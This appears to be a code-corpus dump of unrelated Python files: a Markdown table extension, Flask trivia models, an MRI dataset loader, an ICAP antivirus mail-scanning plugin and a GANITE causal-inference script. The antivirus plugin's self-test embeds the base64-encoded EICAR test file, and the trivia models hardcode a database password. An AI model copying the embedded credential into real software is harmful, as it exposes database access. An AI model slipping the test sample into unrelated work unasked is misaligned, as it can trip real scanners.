table = etree.SubElement(parent, 'table')
thead = etree.SubElement(table, 'thead')
self._build_row(header, thead, align, border)
tbody = etree.SubElement(table, 'tbody')
for row in rows:
self._build_row(row.strip(), tbody, align, border)
def _build_row(self, row, parent, align, border):
tr = etree.SubElement(parent, 'tr')
tag = 'td'
if parent.tag == 'thead':
tag = 'th'
cells = self._split_row(row, border)
for i, a in enumerate(align):
c = etree.SubElement(tr, tag)
try:
c.text = cells[i].strip()
except IndexError:
c.text = ''
if a:
c.set('align', a)
def _split_row(self, row, border):
if border:
if row.startswith('|'):
row = row[1:]
if row.endswith('|'):
row = row[:-1]
return row.split('|')
class TableExtension(markdown.Extension):
def extendMarkdown(self, md, md_globals):
md.parser.blockprocessors.add('table', TableProcessor(md.parser), '<hashheader')
def makeExtension(configs = {}):
return TableExtension(configs=configs)
| [
"le02005@163.com"
] | le02005@163.com |
c569d1d6c880f26851eb4eeaee69948d486704f1 | 7247379c3641dbd21496e8225b7c91e2a6c8f90e | /backend/models.py | 037fe71cb0bcbaeb660eec4ac73d3c4098c55f10 | [] | no_license | ZiadEzat/triviaapp | 4568ebee6c960206cd64badc6b19acc40078ca42 | 4439f736f54b7dfb6b24f6b2b43d8552f12111cb | refs/heads/master | 2022-12-12T17:06:03.732356 | 2020-09-09T01:01:44 | 2020-09-09T01:01:44 | 292,440,967 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,608 | py | import os
from sqlalchemy import Column, String, Integer, create_engine
from flask_sqlalchemy import SQLAlchemy
import json
database_name = "trivia"
database_path = "postgresql://postgres:951753@localhost:5432/trivia"
db = SQLAlchemy()
'''
setup_db(app)
binds a flask application and a SQLAlchemy service
'''
def setup_db(app, database_path=database_path):
app.config["SQLALCHEMY_DATABASE_URI"] = database_path
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
db.app = app
db.init_app(app)
db.create_all()
'''
Question
'''
class Question(db.Model):
__tablename__ = 'questions'
id = Column(Integer, primary_key=True)
question = Column(String)
answer = Column(String)
category = Column(String)
difficulty = Column(Integer)
def __init__(self, question, answer, category, difficulty):
self.question = question
self.answer = answer
self.category = category
self.difficulty = difficulty
def insert(self):
db.session.add(self)
db.session.commit()
def update(self):
db.session.commit()
def delete(self):
db.session.delete(self)
db.session.commit()
def format(self):
return {
'id': self.id,
'question': self.question,
'answer': self.answer,
'category': self.category,
'difficulty': self.difficulty
}
'''
Category
'''
class Category(db.Model):
__tablename__ = 'categories'
id = Column(Integer, primary_key=True)
type = Column(String)
def __init__(self, type):
self.type = type
def format(self):
return {
'id': self.id,
'type': self.type
} | [
"ziad.esam.ezat@gmail.com"
] | ziad.esam.ezat@gmail.com |
fe4a4445d2df78bcbcf7b4ff07872ff1126fe735 | 26f0111163daf2e1bfa453407c187f6ad19f56b4 | /main_code/dataset.py | 4bc7d87c8051929a68e246275c80fa19a849b7c7 | [] | no_license | pcmin03/mge55101-20195104 | d5092848034109193a955fae5c775bb7cafa3737 | 83691560970d762ae4daa81060c2ceb8302016c9 | refs/heads/master | 2022-11-04T21:42:09.288609 | 2020-06-19T21:59:35 | 2020-06-19T21:59:35 | 247,850,133 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,529 | py | import io
import numpy as np
from glob import glob
from natsort import natsorted
from utils import *
from sklearn.model_selection import KFold
import skimage
#################################################################
# data load #
#################################################################
from natsort import natsorted
class mydataset(Dataset):
def __init__(self,imageDir,size,fold_num=1,trainning = False,kfold=True,self_supervised=False):
self.size = size
self.self_supervised = self_supervised
images = np.array(natsorted(glob(imageDir+'*')))
if kfold == True:
#kfold (cross validation)
kfold = KFold(n_splits=9)
train = dict()
label = dict()
i = 0
for train_index, test_index in kfold.split(images):
img_train,img_test = images[train_index], images[test_index]
i+=1
train.update([('train'+str(i),img_train),('test'+str(i),img_test)])
train_num, test_num = 'train'+str(fold_num), 'test'+str(fold_num)
if trainning == True:
self.images = train[train_num]
print(f"img_train:{len(img_train)} \t CV_train:{train_num} ")
else:
self.images = train[test_num]
print(f"img_test:{len(img_test)} \t CV_test:{test_num}")
elif kfold == False:
self.images = images
# self.L_transform = transforms.Compose([transforms.ToTensor(),
# transforms.Normalize([0.5], [0.5])])
self.L_transform = transforms.Lambda(lambda image: torch.tensor(np.array(image).astype(np.float32)))
def normal_pdf(self,length, sensitivity):
return np.exp(-sensitivity * (np.arange(length) - length / 2)**2)
def cartesian_mask(self,shape, acc, sample_n=10, centred=False):
"""
Sampling density estimated from implementation of kt FOCUSS
shape: tuple - of form (..., nx, ny)
acc: float - doesn't have to be integer 4, 8, etc..
"""
N, Nx, Ny = int(np.prod(shape[:-2])), shape[-2], shape[-1]
pdf_x = self.normal_pdf(Nx, 0.5/(Nx/10.)**2)
lmda = Nx/(2.*acc)
n_lines = int(Nx / acc)
# add uniform distribution
pdf_x += lmda * 1./Nx
if sample_n:
pdf_x[Nx//2-sample_n//2:Nx//2+sample_n//2] = 0
pdf_x /= np.sum(pdf_x)
n_lines -= sample_n
mask = np.zeros((N, Nx))
for i in range(N):
idx = np.random.choice(Nx, n_lines, False, pdf_x)
mask[i, idx] = 1
if sample_n:
mask[:, Nx//2-sample_n//2:Nx//2+sample_n//2] = 1
size = mask.itemsize
mask = as_strided(mask, (N, Nx, Ny), (size * Nx, size, 0))
mask = mask.reshape(shape)
if not centred:
mask = np.fft.ifftshift(mask, axes=(-2,-1))
return mask
def random_flip(self,image, seed=None):
# assert image.ndim == 5
if seed:
np.random.seed(seed)
random_flip = np.random.randint(1,5)
if random_flip==1:
flipped = image[::1,::-1,:]
image = flipped
elif random_flip==2:
flipped = image[::-1,::1,:]
image = flipped
elif random_flip==3:
flipped = image[::-1,::-1,:]
image = flipped
elif random_flip==4:
flipped = image
image = flipped
return image
def random_square_rotate(self,image, seed=None):
# assert image.ndim == 5
if seed:
np.random.seed(seed)
random_rotatedeg = 90*np.random.randint(0,4)
rotated = image
from scipy.ndimage.interpolation import rotate
if image.ndim==4:
rotated = rotate(image, random_rotatedeg, axes=(1,2))
elif image.ndim==3:
rotated = rotate(image, random_rotatedeg, axes=(0,1))
image = rotated
return image
def random_crop(self,image, seed=None):
if seed:
np.random.seed(seed)
limit = np.random.randint(10,12) # Crop pixel
randy = np.random.randint(0, limit)
randx = np.random.randint(0, limit)
cropped = image[..., randx:-(limit-randx), randx:-(limit-randx),:]
a=len(cropped[0,:,0])
d=len(image[0,:,0])
cropped=rescale(cropped,(d/a))
return cropped
def transform(self,img):
seed = np.random.randint(0, 2019)
img = self.random_flip(img,seed=seed)
img = self.random_square_rotate(img,seed=seed)
# img = self.random_crop(img,seed=seed)
return img
def __len__(self):
if self.size==1:
return len(self.images)
else:
return len(self.images)
def __getitem__(self,index):
image = skimage.io.imread(self.images[index])
mask = self.cartesian_mask((1,len(image[:]),len(image[:])),self.size,sample_n=5)[0]
image = image.astype(np.uint8)
#make imaginary channel & real channel
# image = self.L_transform(image)[0]
image=cvt2tanh(image)
if self.self_supervised == True:
mask2 = self.cartesian_mask((1,len(image[:]),len(image[:])),2,sample_n=5)[0]
mask2 = np.stack((mask2, np.zeros_like(mask2)), axis=0)
mask2 = torch.tensor(np.array(mask2))
# print(image.shape,mask.shape)
image = np.stack((image, np.zeros_like(image)), axis=0)
mask_s = np.stack((mask, np.zeros_like(mask)), axis=0)
# print(image.shape,mask_s.shape)
real_images = np.array(image)
mask_image = np.array(mask_s)
# img=cvt2tanh(real_images)
img = self.L_transform(real_images)
mas = torch.tensor(np.array(mask_image))
# img = real_images
# mas = mask_image
# print(real)
# print(img.shape,mas.shape)
# print(real_images.shape,img.max())
if self.self_supervised == True:
return img, mas, mask2
else :
return img, mas | [
"pcmin03@gmail.com"
] | pcmin03@gmail.com |
3d76924803db335c9cb94bb42f4444f162c2d2ae | 936f72b46215b89b277ffd57256e54f727ce1ac5 | /spark-comp04/token.py | 3147a73cbc6b3be806e113977983bf177f1a4f32 | [] | no_license | luizirber/dc-compilers | 91dc99097d628339b53b20a0c0f2a6255a599b7a | 4a47e786583c5f50cac2ac3a35de195f7be7a735 | refs/heads/master | 2016-09-06T11:27:51.815748 | 2012-07-03T01:28:26 | 2012-07-03T01:28:26 | 41,540 | 7 | 0 | null | null | null | null | UTF-8 | Python | false | false | 278 | py | class Token(object):
def __init__(self, type, attr=None, lineno='???'):
self.type = type
self.attr = attr
self.lineno = lineno
def __cmp__(self, o):
return cmp(self.type, o)
def __repr__(self):
return self.attr or self.type
| [
"luiz.irber@gmail.com"
] | luiz.irber@gmail.com |
e8ecf7fc0963b49fbee6320bd113e8f851195674 | add161c6e8d86dc8448d4f3d4b61a173a3a4543a | /fuglu/src/fuglu/plugins/icap.py | 7c45e6ac0df6497843ea46eb04e299795b1f6fe7 | [
"Apache-2.0"
] | permissive | sporkman/fuglu | 9a578746a52308d618a6edcd7abeb4c50fb0f6fc | 1b458147a93ed17927e0fe16debd80b6f690d11b | refs/heads/master | 2021-01-12T22:30:50.575560 | 2015-04-06T10:07:51 | 2015-04-06T10:07:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,724 | py | # Copyright 2009-2015 Oli Schacher
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# http://vaibhavkulkarni.wordpress.com/2007/11/19/a-icap-client-code-in-c-to-virus-scan-a-file-using-symantec-scan-server/
from fuglu.shared import ScannerPlugin, string_to_actioncode, DEFER, DUNNO, actioncode_to_string, Suspect, apply_template
import socket
import os
class ICAPPlugin(ScannerPlugin):
"""ICAP Antivirus Plugin
This plugin allows Antivirus Scanning over the ICAP Protocol (http://tools.ietf.org/html/rfc3507 )
supported by some AV Scanners like Symantec and Sophos. For sophos, however, it is recommended to use the native SSSP Protocol.
Prerequisites: requires an ICAP capable antivirus engine somewhere in your network
"""
def __init__(self, config, section=None):
ScannerPlugin.__init__(self, config, section)
self.requiredvars = {
'host': {
'default': 'localhost',
'description': 'hostname where the ICAP server runs',
},
'port': {
'default': '1344',
'description': "tcp port or path to unix socket",
},
'timeout': {
'default': '10',
'description': 'socket timeout',
},
'maxsize': {
'default': '22000000',
'description': "maximum message size, larger messages will not be scanned. ",
},
'retries': {
'default': '3',
'description': 'how often should fuglu retry the connection before giving up',
},
'virusaction': {
'default': 'DEFAULTVIRUSACTION',
'description': "action if infection is detected (DUNNO, REJECT, DELETE)",
},
'problemaction': {
'default': 'DEFER',
'description': "action if there is a problem (DUNNO, DEFER)",
},
'rejectmessage': {
'default': 'threat detected: ${virusname}',
'description': "reject message template if running in pre-queue mode and virusaction=REJECT",
},
'service': {
'default': 'AVSCAN',
'description': 'ICAP Av scan service, usually AVSCAN (sophos, symantec)',
},
'enginename': {
'default': 'icap-generic',
'description': "name of the virus engine behind the icap service. used to inform other plugins. can be anything like 'sophos', 'symantec', ...",
},
}
self.logger = self._logger()
def __str__(self):
return "ICAP AV"
def _problemcode(self):
retcode = string_to_actioncode(
self.config.get(self.section, 'problemaction'), self.config)
if retcode != None:
return retcode
else:
# in case of invalid problem action
return DEFER
def examine(self, suspect):
enginename = self.config.get(self.section, 'enginename')
if suspect.size > self.config.getint(self.section, 'maxsize'):
self.logger.info('Not scanning - message too big')
return
content = suspect.get_source()
for i in range(0, self.config.getint(self.section, 'retries')):
try:
viruses = self.scan_stream(content)
if viruses != None:
self.logger.info(
"Virus found in message from %s : %s" % (suspect.from_address, viruses))
suspect.tags['virus'][enginename] = True
suspect.tags['%s.virus' % enginename] = viruses
suspect.debug('viruses found in message : %s' % viruses)
else:
suspect.tags['virus'][enginename] = False
if viruses != None:
virusaction = self.config.get(self.section, 'virusaction')
actioncode = string_to_actioncode(virusaction, self.config)
firstinfected, firstvirusname = viruses.items()[0]
values = dict(
infectedfile=firstinfected, virusname=firstvirusname)
message = apply_template(
self.config.get(self.section, 'rejectmessage'), suspect, values)
return actioncode, message
return DUNNO
except Exception, e:
self.logger.warning("Error encountered while contacting ICAP server (try %s of %s): %s" % (
i + 1, self.config.getint(self.section, 'retries'), str(e)))
self.logger.error("ICAP scan failed after %s retries" %
self.config.getint(self.section, 'retries'))
content = None
return self._problemcode()
def scan_stream(self, buf):
"""
Scan a buffer
buffer (string) : buffer to scan
return either :
- (dict) : {filename1: "virusname"}
- None if no virus found
"""
s = self.__init_socket__()
dr = {}
CRLF = "\r\n"
host = self.config.get(self.section, 'host')
port = self.config.get(self.section, 'port')
service = self.config.get(self.section, 'service')
buflen = len(buf)
# in theory, these fake headers are optional according to the ICAP errata
# and sophos docs
# but better be safe than sorry
fakerequestheader = "GET http://localhost/message.eml HTTP/1.1" + CRLF
fakerequestheader += "Host: localhost" + CRLF
fakerequestheader += CRLF
fakereqlen = len(fakerequestheader)
fakeresponseheader = "HTTP/1.1 200 OK" + CRLF
fakeresponseheader += "Content-Type: message/rfc822" + CRLF
fakeresponseheader += "Content-Length: " + str(buflen) + CRLF
fakeresponseheader += CRLF
fakeresplen = len(fakeresponseheader)
bodyparthexlen = hex(buflen)[2:]
bodypart = bodyparthexlen + CRLF
bodypart += buf + CRLF
bodypart += "0" + CRLF
hdrstart = 0
responsestart = fakereqlen
bodystart = fakereqlen + fakeresplen
# now that we know the length of the fake request/response, we can
# build the ICAP header
icapheader = ""
icapheader += "RESPMOD icap://%s:%s/%s ICAP/1.0 %s" % (
host, port, service, CRLF)
icapheader += "Host: " + host + CRLF
icapheader += "Allow: 204" + CRLF
icapheader += "Encapsulated: req-hdr=%s, res-hdr=%s, res-body=%s%s" % (
hdrstart, responsestart, bodystart, CRLF)
icapheader += CRLF
everything = icapheader + fakerequestheader + \
fakeresponseheader + bodypart + CRLF
s.sendall(everything)
result = s.recv(20000)
s.close()
sheader = "X-Violations-Found:"
if sheader.lower() in result.lower():
lines = result.split('\n')
lineidx = 0
for line in lines:
if sheader.lower() in line.lower():
numfound = int(line[len(sheader):])
# for each found virus, get 4 lines
for vircount in range(numfound):
infectedfile = lines[
lineidx + vircount * 4 + 1].strip()
infection = lines[lineidx + vircount * 4 + 2].strip()
dr[infectedfile] = infection
break
lineidx += 1
if dr == {}:
return None
else:
return dr
def __init_socket__(self):
icap_HOST = self.config.get(self.section, 'host')
unixsocket = False
try:
iport = int(self.config.get(self.section, 'port'))
except ValueError:
unixsocket = True
if unixsocket:
sock = self.config.get(self.section, 'port')
if not os.path.exists(sock):
raise Exception("unix socket %s not found" % sock)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.settimeout(self.config.getint(self.section, 'timeout'))
try:
s.connect(sock)
except socket.error:
raise Exception(
'Could not reach ICAP server using unix socket %s' % sock)
else:
icap_PORT = int(self.config.get(self.section, 'port'))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(self.config.getint(self.section, 'timeout'))
try:
s.connect((icap_HOST, icap_PORT))
except socket.error:
raise Exception(
'Could not reach ICAP server using network (%s, %s)' % (icap_HOST, icap_PORT))
return s
def lint(self):
viract = self.config.get(self.section, 'virusaction')
print "Virusaction: %s" % actioncode_to_string(string_to_actioncode(viract, self.config))
allok = (self.checkConfig() and self.lint_eicar())
return allok
def lint_eicar(self):
stream = """Date: Mon, 08 Sep 2008 17:33:54 +0200
To: oli@unittests.fuglu.org
From: oli@unittests.fuglu.org
Subject: test eicar attachment
X-Mailer: swaks v20061116.0 jetmore.org/john/code/#swaks
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_MIME_BOUNDARY_000_12140"
------=_MIME_BOUNDARY_000_12140
Content-Type: text/plain
Eicar test
------=_MIME_BOUNDARY_000_12140
Content-Type: application/octet-stream
Content-Transfer-Encoding: BASE64
Content-Disposition: attachment
UEsDBAoAAAAAAGQ7WyUjS4psRgAAAEYAAAAJAAAAZWljYXIuY29tWDVPIVAlQEFQWzRcUFpYNTQo
UF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCoNClBLAQIU
AAoAAAAAAGQ7WyUjS4psRgAAAEYAAAAJAAAAAAAAAAEAIAD/gQAAAABlaWNhci5jb21QSwUGAAAA
AAEAAQA3AAAAbQAAAAAA
------=_MIME_BOUNDARY_000_12140--"""
result = self.scan_stream(stream)
if result == None:
print "EICAR Test virus not found!"
return False
print "ICAP server found virus", result
return True
| [
"oli@fuglu.org"
] | oli@fuglu.org |
583f60ff287cee838ecb0f535047399292eeab50 | 653eaef652627b155569b5fe9ab9bb3607fc1e78 | /alg/ganite/ganite.py | 1e5aaedc8c7c7720ded1a6bf6cee744f9f7711a5 | [
"BSD-3-Clause"
] | permissive | IlyaTrofimov/mlforhealthlabpub | 11ab86a83bd2ffd2574364a956b322b0c62406ae | 190cbad2faae9e559ffe7a68143df7f747d70adc | refs/heads/main | 2023-04-16T03:58:38.423288 | 2021-04-21T10:22:43 | 2021-04-21T10:22:43 | 358,528,623 | 0 | 0 | NOASSERTION | 2021-04-16T08:25:26 | 2021-04-16T08:25:25 | null | UTF-8 | Python | false | false | 12,408 | py | '''
GANITE:
Jinsung Yoon 10/11/2017
'''
import tensorflow as tf
import numpy as np
from tqdm import tqdm
import argparse
import os
import json
import pandas as pd
import initpath_alg
initpath_alg.init_sys_path()
import utilmlab
def init_arg():
parser = argparse.ArgumentParser()
parser.add_argument("--alpha", default=1, type=float)
parser.add_argument("--kk", default=10, type=int)
parser.add_argument("--it", default=10000, type=int)
parser.add_argument("-o", default='./result.json')
parser.add_argument('-ocsv')
parser.add_argument("--trainx", default="trainx.csv")
parser.add_argument("--trainy", default="trainy.csv")
parser.add_argument("--traint")
parser.add_argument("--testx", default="testx.csv")
parser.add_argument("--testy", default="testy.csv")
parser.add_argument("--testt")
return parser.parse_args()
#%% Performance Metrics
def Perf_RPol_ATT(Test_T, Test_Y, Output_Y):
# RPol
# Decision of Output_Y
hat_t = np.sign(Output_Y[:,1] - Output_Y[:,0])
hat_t = (0.5*(hat_t + 1))
new_hat_t = np.abs(1-hat_t)
# Intersection
idx1 = hat_t * Test_T
idx0 = new_hat_t * (1-Test_T)
# RPol Computation
RPol1 = (np.sum(idx1 * Test_Y)/(np.sum(idx1)+1e-8)) * np.mean(hat_t)
RPol0 = (np.sum(idx0 * Test_Y)/(np.sum(idx0)+1e-8)) * np.mean(new_hat_t)
RPol = 1 - (RPol1 + RPol0)
# ATT
# Original ATT
ATT_value = np.sum(Test_T * Test_Y) / (np.sum(Test_T) + 1e-8) - np.sum((1-Test_T) * Test_Y) / (np.sum(1-Test_T) + 1e-8)
# Estimated ATT
ATT_estimate = np.sum(Test_T * (Output_Y[:,1] - Output_Y[:,0]) ) / (np.sum(Test_T) + 1e-8)
# Final ATT
ATT = np.abs( ATT_value - ATT_estimate )
print('pol0:{} pol1:{} pol:{} mean hat:{} mean new hat:{} ATT:{}'.format(RPol0, RPol1, RPol, np.mean(hat_t), np.mean(new_hat_t), ATT))
return [RPol, ATT]
def PEHE(y, hat_y):
e_PEHE = tf.reduce_mean( tf.squared_difference( (y[:,1]-y[:,0]), (hat_y[:,1] - hat_y[:,0]) ))
return e_PEHE
def ATE(y, hat_y):
e_PEHE = tf.abs( tf.reduce_mean( y[:,1]-y[:,0] ) - tf.reduce_mean( hat_y[:,1]-hat_y[:,0] ) )
return e_PEHE
def xavier_init(size):
in_dim = size[0]
xavier_stddev = 1. / tf.sqrt(in_dim / 2.)
return tf.random_normal(shape = size, stddev = xavier_stddev)
# 3.1 Generator
def generator(x,t,y):
inputs = tf.concat(axis = 1, values = [x,t,y])
G_h1 = tf.nn.relu(tf.matmul(inputs, G_W1) + G_b1)
G_h2 = tf.nn.relu(tf.matmul(G_h1, G_W2) + G_b2)
G_h31 = tf.nn.relu(tf.matmul(G_h2, G_W31) + G_b31)
G_prob1 = (tf.matmul(G_h31, G_W32) + G_b32)
G_h41 = tf.nn.relu(tf.matmul(G_h2, G_W41) + G_b41)
G_prob2 = (tf.matmul(G_h41, G_W42) + G_b42)
G_prob = tf.nn.sigmoid(tf.concat(axis = 1, values = [G_prob1, G_prob2]))
return G_prob
# 3.2. Discriminator
def discriminator(x,t,y,hat_y):
# Factual & Counterfactual outcomes concatenate
inp0 = (1.-t) * y + t * tf.reshape(hat_y[:,0], [-1,1])
inp1 = t * y + (1.-t) * tf.reshape(hat_y[:,1], [-1,1])
inputs = tf.concat(axis = 1, values = [x,inp0,inp1])
D_h1 = tf.nn.relu(tf.matmul(inputs, D_W1) + D_b1)
D_h2 = tf.nn.relu(tf.matmul(D_h1, D_W2) + D_b2)
D_logit = tf.matmul(D_h2, D_W3) + D_b3
return D_logit
# 3.3. Inference Nets
def inference(x):
I_h1 = tf.nn.relu(tf.matmul(x, I_W1) + I_b1)
I_h2 = tf.nn.relu(tf.matmul(I_h1, I_W2) + I_b2)
I_h31 = tf.nn.relu(tf.matmul(I_h2, I_W31) + I_b31)
I_prob1 = (tf.matmul(I_h31, I_W32) + I_b32)
I_h41 = tf.nn.relu(tf.matmul(I_h2, I_W41) + I_b41)
I_prob2 = (tf.matmul(I_h41, I_W42) + I_b42)
I_prob = tf.nn.sigmoid(tf.concat(axis = 1, values = [I_prob1, I_prob2]))
return I_prob
# Random sample generator for Z and R
def sample_Z(m, n):
return np.random.uniform(-1., 1., size = [m, n])
def sample_X(X, size):
start_idx = np.random.randint(0, X.shape[0], size)
return start_idx
if __name__ == '__main__':
args = init_arg()
fn_trainx, fn_trainy, fn_traint = args.trainx, args.trainy, args.traint
fn_testx, fn_testy, fn_testt = args.testx, args.testy, args.testt
Train_X = pd.read_csv(fn_trainx).values
Train_Y = pd.read_csv(fn_trainy).values
Train_T = pd.read_csv(fn_traint).values if fn_traint is not None else None
Test_X = pd.read_csv(fn_testx).values
Test_Y = pd.read_csv(fn_testy).values
Test_T = pd.read_csv(fn_testt).values if fn_testt is not None else None
dim_outcome = Test_Y.shape[1]
fn_json = args.o
fn_csv = args.ocsv
num_iterations = args.it
mb_size = 256
alpha = args.alpha
num_kk = args.kk
Train_No = len(Train_X)
Test_No = len(Test_X)
Dim = len(Train_X[0])
H_Dim1 = int(Dim)
H_Dim2 = int(Dim)
tf.reset_default_graph()
#%% 1. Input
# 1.1. Feature (X)
X = tf.placeholder(tf.float32, shape = [None, Dim])
# 1.2. Treatment (T)
T = tf.placeholder(tf.float32, shape = [None, 1])
# 1.3. Outcome (Y)
Y = tf.placeholder(tf.float32, shape = [None, 1])
# 1.6. Test Outcome (Y_T) - Potential outcome
# Y_T = tf.placeholder(tf.float32, shape = [None, 2]) # Twins
# Y_T = tf.placeholder(tf.float32, shape = [None, 1]) # Jobs
Y_T = tf.placeholder(tf.float32, shape = [None, dim_outcome])
#%% 2. layer construction
# 2.1 Generator Layer
G_W1 = tf.Variable(xavier_init([(Dim+2), H_Dim1])) # Inputs: X + Treatment (1) + Factual Outcome (1) + Random Vector (Z)
G_b1 = tf.Variable(tf.zeros(shape = [H_Dim1]))
G_W2 = tf.Variable(xavier_init([H_Dim1, H_Dim2]))
G_b2 = tf.Variable(tf.zeros(shape = [H_Dim2]))
G_W31 = tf.Variable(xavier_init([H_Dim2, H_Dim2]))
G_b31 = tf.Variable(tf.zeros(shape = [H_Dim2])) # Output: Estimated Potential Outcomes
G_W32 = tf.Variable(xavier_init([H_Dim2, 1]))
G_b32 = tf.Variable(tf.zeros(shape = [1])) # Output: Estimated Potential Outcomes
G_W41 = tf.Variable(xavier_init([H_Dim2, H_Dim2]))
G_b41 = tf.Variable(tf.zeros(shape = [H_Dim2])) # Output: Estimated Potential Outcomes
G_W42 = tf.Variable(xavier_init([H_Dim2, 1]))
G_b42 = tf.Variable(tf.zeros(shape = [1])) # Output: Estimated Potential Outcomes
theta_G = [G_W1, G_W2, G_W31, G_W32, G_W41, G_W42, G_b1, G_b2, G_b31, G_b32, G_b41, G_b42]
# 2.2 Discriminator
D_W1 = tf.Variable(xavier_init([(Dim+2), H_Dim1])) # Inputs: X + Factual Outcomes + Estimated Counterfactual Outcomes
D_b1 = tf.Variable(tf.zeros(shape = [H_Dim1]))
D_W2 = tf.Variable(xavier_init([H_Dim1, H_Dim2]))
D_b2 = tf.Variable(tf.zeros(shape = [H_Dim2]))
D_W3 = tf.Variable(xavier_init([H_Dim2, 1]))
D_b3 = tf.Variable(tf.zeros(shape = [1]))
theta_D = [D_W1, D_W2, D_W3, D_b1, D_b2, D_b3]
# 2.3 Inference Layer
I_W1 = tf.Variable(xavier_init([(Dim), H_Dim1]))
I_b1 = tf.Variable(tf.zeros(shape = [H_Dim1]))
I_W2 = tf.Variable(xavier_init([H_Dim1, H_Dim2]))
I_b2 = tf.Variable(tf.zeros(shape = [H_Dim2]))
I_W31 = tf.Variable(xavier_init([H_Dim2, H_Dim2]))
I_b31 = tf.Variable(tf.zeros(shape = [H_Dim2]))
I_W32 = tf.Variable(xavier_init([H_Dim2, 1]))
I_b32 = tf.Variable(tf.zeros(shape = [1]))
I_W41 = tf.Variable(xavier_init([H_Dim2, H_Dim2]))
I_b41 = tf.Variable(tf.zeros(shape = [H_Dim2]))
I_W42 = tf.Variable(xavier_init([H_Dim2, 1]))
I_b42 = tf.Variable(tf.zeros(shape = [1]))
theta_I = [I_W1, I_W2, I_W31, I_W32, I_W41, I_W42, I_b1, I_b2, I_b31, I_b32, I_b41, I_b42]
#%% Structure
# 1. Generator
Tilde = generator(X,T,Y)
# 2. Discriminator
D_logit = discriminator(X,T,Y,Tilde)
# 3. Inference function
Hat = inference(X)
#%% Loss
# 1. Discriminator loss
#D_loss = -tf.reduce_mean(T * tf.log(D_prob + 1e-8) + (1. -T) * tf.log(1. - D_prob + 1e-8))
D_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels = T, logits = D_logit ))
# 2. Generator loss
G_loss_GAN = -D_loss
G_loss_R = tf.reduce_mean(tf.losses.mean_squared_error(Y, (T * tf.reshape(Tilde[:,1],[-1,1]) + (1. - T) * tf.reshape(Tilde[:,0],[-1,1]) )))
G_loss = G_loss_R + alpha * G_loss_GAN
# 4. Inference loss
I_loss1 = tf.reduce_mean(tf.losses.mean_squared_error((T) * Y + (1-T) * tf.reshape(Tilde[:,1],[-1,1]), tf.reshape(Hat[:,1],[-1,1]) ))
I_loss2 = tf.reduce_mean(tf.losses.mean_squared_error((1-T) * Y + (T) * tf.reshape(Tilde[:,0],[-1,1]), tf.reshape(Hat[:,0],[-1,1]) ))
I_loss = I_loss1 + I_loss2
# Loss Followup
if Test_T is None:
Hat_Y = Hat
Loss1 = PEHE(Y_T, Hat_Y)
Loss2 = ATE(Y_T, Hat_Y)
#%% Solver
G_solver = tf.train.AdamOptimizer().minimize(G_loss, var_list=theta_G)
D_solver = tf.train.AdamOptimizer().minimize(D_loss, var_list=theta_D)
I_solver = tf.train.AdamOptimizer().minimize(I_loss, var_list=theta_I)
#%% Sessions
sess = tf.Session()
sess.run(tf.global_variables_initializer())
# Iterations
# Train G and D first
for it in tqdm(range(num_iterations)):
for kk in range(num_kk):
idx_mb = sample_X(Train_X, mb_size)
X_mb = Train_X[idx_mb,:]
T_mb = np.reshape(Train_T[idx_mb], [mb_size,1])
Y_mb = np.reshape(Train_Y[idx_mb], [mb_size,1])
_, D_loss_curr = sess.run([D_solver, D_loss], feed_dict = {X: X_mb, T: T_mb, Y: Y_mb})
idx_mb = sample_X(Train_X, mb_size)
X_mb = Train_X[idx_mb,:]
T_mb = np.reshape(Train_T[idx_mb], [mb_size,1])
Y_mb = np.reshape(Train_Y[idx_mb], [mb_size,1])
_, G_loss_curr, Tilde_curr = sess.run([G_solver, G_loss, Tilde], feed_dict = {X: X_mb, T: T_mb, Y: Y_mb})
#%% Testing
if it % 100 == 0:
print('Iter: {}'.format(it))
print('D_loss: {:.4}'.format((D_loss_curr)))
print('G_loss: {:.4}'.format((G_loss_curr)))
print()
# Train I and ID
result = {}
for it in tqdm(range(num_iterations)):
idx_mb = sample_X(Train_X, mb_size)
X_mb = Train_X[idx_mb,:]
T_mb = np.reshape(Train_T[idx_mb], [mb_size,1])
Y_mb = np.reshape(Train_Y[idx_mb], [mb_size,1])
_, I_loss_curr = sess.run([I_solver, I_loss], feed_dict = {X: X_mb, T: T_mb, Y: Y_mb})
#%% Testing
if it % 100 == 0:
result = {
'alpha': alpha,
'kk': num_kk
}
if Test_T is not None:
Hat_curr = sess.run([Hat], feed_dict = {X: Test_X})[0]
[R_Pol_Out, B] = Perf_RPol_ATT(Test_T, Test_Y, Hat_curr)
print('Iter: {}'.format(it))
print('I_loss: {:.4}'.format((I_loss_curr)))
print('R_Pol_Out: {:.4}'.format(R_Pol_Out))
print('')
result['R_Pol_Out'] = float(R_Pol_Out)
else:
New_X_mb = Test_X
Y_T_mb = Test_Y
Loss1_curr, Loss2_curr, Hat_curr = sess.run([Loss1, Loss2, Hat], feed_dict = {X: New_X_mb, Y_T: Y_T_mb})
print('Iter: {}'.format(it))
print('I_loss: {:.4}'.format((I_loss_curr)))
print('Loss_PEHE_Out: {:.4}'.format(np.sqrt(Loss1_curr)))
print('Loss_ATE_Out: {:.4}'.format(Loss2_curr))
print('')
result['Loss_PEHE_Out'] = float(np.sqrt(Loss1_curr))
result['Loss_ATE_Out'] = float(Loss2_curr)
with open(fn_json, "w") as fp:
json.dump(result, fp)
if fn_csv is not None:
Hat_curr = sess.run([Hat], feed_dict = {X: Test_X})[0]
if Test_T is not None:
[R_Pol_Out, B] = Perf_RPol_ATT(Test_T, Test_Y, Hat_curr)
